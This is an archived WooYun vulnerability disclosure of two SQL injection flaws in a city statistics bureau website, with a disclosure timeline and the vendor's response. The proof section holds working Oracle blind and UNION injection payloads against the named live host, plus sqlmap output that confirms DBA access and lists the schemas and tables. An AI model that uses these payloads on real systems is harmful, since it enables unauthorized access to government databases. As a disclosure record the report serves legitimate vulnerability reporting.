当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123135

漏洞标题:某市统计局存在两处SQL注入(DBA权限)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-07-02 10:49

修复时间:2015-08-20 18:54

公开时间:2015-08-20 18:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-02: 细节已通知厂商并且等待厂商处理中
2015-07-06: 厂商已经确认,细节仅向厂商公开
2015-07-16: 细节向核心白帽子及相关领域专家公开
2015-07-26: 细节向普通白帽子公开
2015-08-05: 细节向实习白帽子公开
2015-08-20: 细节向公众公开

简要描述:

RT

详细说明:

两处SQL注入:
第一处:

http://tjdata.haimen.gov.cn/chart_singleDataList.do?type=index
post参数
change=0&ids=&ndSearchEnd=-1&ndSearchStart=&nowPage=1&pageCount=36&pageEnd=0&sblx=nd&sblxsc=nd&zbid=9D45DAB40C074E80B70C524A37498CC8
ndSearchEnd参数存在注入


第二处:

http://tjdata.haimen.gov.cn/chart_economicDataList.do?type=index
post参数
change=0&dqlx=hms&fid=F737524D35DF4F0AA3AE2D142FBE0CFC&ids=&ndSearchEnd=-1&ndSearchStart=&nowPage=1&pageCount=24&pageEnd=0&sblx=jd&sblxsc=ndndSearchEnd参数存在注入ndSearchEn
ndSearchEnd参数存在注入


gov.jpg


漏洞证明:

sqlmap证明下:

sqlmap identified the following injection points with a total of 1231 HTTP(s) requests:
---
Parameter: ndSearchEnd (POST)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: change=0&ids=&ndSearchEnd=-1' AND 7329=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(117)||CHR(100)||CHR(110),5) AND 'WEbm' LIKE 'WEbm&ndSearchStart=&nowPage=1&pageCount=36&pageEnd=0&sblx=nd&sblxsc=nd&zbid=9D45DAB40C074E80B70C524A37498CC8
    Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: change=0&ids=&ndSearchEnd=-1' UNION ALL SELECT CHR(113)||CHR(107)||CHR(118)||CHR(112)||CHR(113)||CHR(70)||CHR(74)||CHR(111)||CHR(120)||CHR(82)||CHR(102)||CHR(100)||CHR(80)||CHR(84)||CHR(72)||CHR(113)||CHR(118)||CHR(118)||CHR(106)||CHR(113),NULL FROM DUAL-- &ndSearchStart=&nowPage=1&pageCount=36&pageEnd=0&sblx=nd&sblxsc=nd&zbid=9D45DAB40C074E80B70C524A37498CC8
    Vector:  UNION ALL SELECT [QUERY],NULL FROM DUAL-- 
---
web application technology: JSP
back-end DBMS: Oracle
current user:    'HMDATA'
current schema (equivalent to database on Oracle):    'HMDATA'
current user is DBA:    True
available databases [24]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HMDATA
[*] HMDATA_TEST
[*] HR
[*] IX
[*] MDSYS
[*] NTDATA
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WK_TEST
[*] WKSYS
[*] WMSYS
[*] XDB
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ndSearchEnd (POST)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: change=0&ids=&ndSearchEnd=-1' AND 7329=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(117)||CHR(100)||CHR(110),5) AND 'WEbm' LIKE 'WEbm&ndSearchStart=&nowPage=1&pageCount=36&pageEnd=0&sblx=nd&sblxsc=nd&zbid=9D45DAB40C074E80B70C524A37498CC8
    Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: change=0&ids=&ndSearchEnd=-1' UNION ALL SELECT CHR(113)||CHR(107)||CHR(118)||CHR(112)||CHR(113)||CHR(70)||CHR(74)||CHR(111)||CHR(120)||CHR(82)||CHR(102)||CHR(100)||CHR(80)||CHR(84)||CHR(72)||CHR(113)||CHR(118)||CHR(118)||CHR(106)||CHR(113),NULL FROM DUAL-- &ndSearchStart=&nowPage=1&pageCount=36&pageEnd=0&sblx=nd&sblxsc=nd&zbid=9D45DAB40C074E80B70C524A37498CC8
    Vector:  UNION ALL SELECT [QUERY],NULL FROM DUAL-- 
---
web application technology: JSP
back-end DBMS: Oracle
Database: HMDATA
[36 tables]
+--------------------------------+
| BIN$/OJ59APMQYYVCQD4R9CYHQ==$0 |
| BIN$3ALHS3TQTQOHN8DVUAZ0GA==$0 |
| BIN$3UEQGJ16SN6O9WXXFS5TEQ==$0 |
| BIN$4PC5VRLUQUEKNRIOIAAXVW==$0 |
| BIN$8GISAK8YS3YQDY+G82LT8G==$0 |
| BIN$BI97240CSNM4I2DGKEVECQ==$0 |
| BIN$BZU1VTUGQKECVMBWXYQQQA==$0 |
| BIN$C8P9KDFTQRI9THM2E9B8QW==$0 |
| BIN$DA2WQDW8QWQDG+3YOKUIBG==$0 |
| BIN$EC7HJVEFQFS8KOFZAJ13ZG==$0 |
| BIN$F4ZJEALCQHYVP49YAPV/DW==$0 |
| BIN$FZOERHRLROAHRH97S9UKTA==$0 |
| BIN$GQJ3SHJHSBGGCA8L9IQFZG==$0 |
| BIN$HVDM3GJSS5YLPT37E/75ZW==$0 |
| BIN$HVQFNYBMRFAW60FW7P+E2G==$0 |
| BIN$JKXK6GNXQY690QMOXUC28W==$0 |
| BIN$KBBOZPLVRLC0L29GGO6/WA==$0 |
| BIN$KUKFYGDZRJGMKJ6IZPEPMQ==$0 |
| BIN$LD6YNGG5TKOKIGC+CUB/8Q==$0 |
| BIN$LKVCXPZRRWUK1AI0U9MU8A==$0 |
| BIN$LQEYNQD/QE6JXWOW/YCLFA==$0 |
| BIN$M71PKD8ITLQVBO+4K/TLPG==$0 |
| BIN$NMWXBK95RV66HL5FXDLRQG==$0 |
| BIN$NXTJK3IOQUKROLHVG9INXQ==$0 |
| BIN$Q+6OUM8XROWG9V9R1FZGXA==$0 |
| BIN$QHHQ4C6GROKUUBSA0VOH8Q==$0 |
| BIN$QPTY2WTORS6Z1G3C5BO2UQ==$0 |
| BIN$QSDI3O4LTEKWOMB3BBKHTW==$0 |
| BIN$RZLQN410Q7KITYI2AJHO/A==$0 |
| BIN$S6YUE2GRQW+F2SBQUUV86A==$0 |
| BIN$SSB0Q8FDTJWE79RTNRT/4A==$0 |
| BIN$T8YAVG71S9ODKSFRVM0PLW==$0 |
| BIN$UQ/MBWKNQUMVOKZP6ACVVA==$0 |
| BIN$URUCNEVWQTEZCAMJ9BGBGA==$0 |
| BIN$WICPQF2PQ1+OK1JHBEQLPQ==$0 |
| BIN$WWPW0DQQTXO52H8MBAVWZW==$0 |
+--------------------------------+

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-07-06 18:52

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置。

最新状态:

暂无